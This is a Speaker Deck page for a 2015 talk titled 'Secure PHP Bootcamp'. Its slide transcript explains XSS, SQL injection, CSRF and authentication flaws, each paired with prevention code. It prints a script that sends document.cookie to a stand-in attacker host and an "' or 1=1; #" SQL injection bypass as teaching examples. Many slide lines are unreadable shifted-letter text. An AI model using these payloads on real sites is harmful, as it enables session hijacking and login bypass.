Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Secure PHP Bootcamp
Search
Chris Cornutt
January 23, 2015
Technology
0
670
Secure PHP Bootcamp
Given at PHP Benelux 2015
Chris Cornutt
January 23, 2015
Tweet
Share
More Decks by Chris Cornutt
See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
150
Pentesting for Developers
ccornutt
0
150
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
200
Pieces of Auth
ccornutt
0
340
Securing Legacy Applications
ccornutt
0
520
Build Security In
ccornutt
0
220
Introduction to Slim 3
ccornutt
0
180
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
290
Other Decks in Technology
See All in Technology
AWS CDK 実践的アプローチ N選 / aws-cdk-practical-approaches
gotok365
4
530
ひとり情シスなCTOがLLMと始めるオペレーション最適化 / CTO's LLM-Powered Ops
yamitzky
0
380
米国国防総省のDevSecOpsライフサイクルをAWSのセキュリティサービスとOSSで実現
syoshie
2
820
(非公式) AWS Summit Japan と 海浜幕張 の歩き方 2025年版
coosuke
PRO
1
340
PHP開発者のためのSOLID原則再入門 #phpcon / PHP Conference Japan 2025
shogogg
2
410
20250625 Snowflake Summit 2025活用事例 レポート / Nowcast Snowflake Summit 2025 Case Study Report
kkuv
1
240
AIエージェント最前線! Amazon Bedrock、Amazon Q、そしてMCPを使いこなそう
minorun365
PRO
11
4.2k
Agentic DevOps時代の生存戦略
kkamegawa
0
1.1k
Navigation3でViewModelにデータを渡す方法
mikanichinose
0
210
IIWレポートからみるID業界で話題のMCP
fujie
0
740
Prox Industries株式会社 会社紹介資料
proxindustries
0
210
ObsidianをMCP連携させてみる
ttnyt8701
2
140
Featured
See All Featured
Building a Scalable Design System with Sketch
lauravandoore
462
33k
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
2.8k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
252
21k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
Adopting Sorbet at Scale
ufuk
77
9.4k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
228
22k
Raft: Consensus for Rubyists
vanstee
140
7k
YesSQL, Process and Tooling at Scale
rocio
173
14k
The Straight Up "How To Draw Better" Workshop
denniskardys
233
140k
The Cult of Friendly URLs
andyhume
79
6.4k
Agile that works and the tools we love
rasmusluckow
329
21k
Transcript
Secure PHP Development $ISJT$PSOVUU!FOZHNB
https://jetbrains.com
Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT
1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN
IUUQCJUMZPXBTQUPQ
5IFSF`T OPTVDIUIJOH BTTFDVSF
IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO
IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN
None
XSS: Cross Site Scripting
*OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH
Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>
Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);
xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG
Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );
echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU
Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)
}} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH
SQLi: SQL Injection
*OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH
Example $sql = ‘select id from users where username =
“‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X
Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where
username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU
CSRF: Cross Site Request Forgery
VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF TJNQMF SBOEPNJ[FE GPSFBDIGPSN
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> </form>
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>
Auth*: Authentication & Authorization
EJSFDUPCKFDUSFGFSFODF " EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU
QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT
None
None
And…
4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET
5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN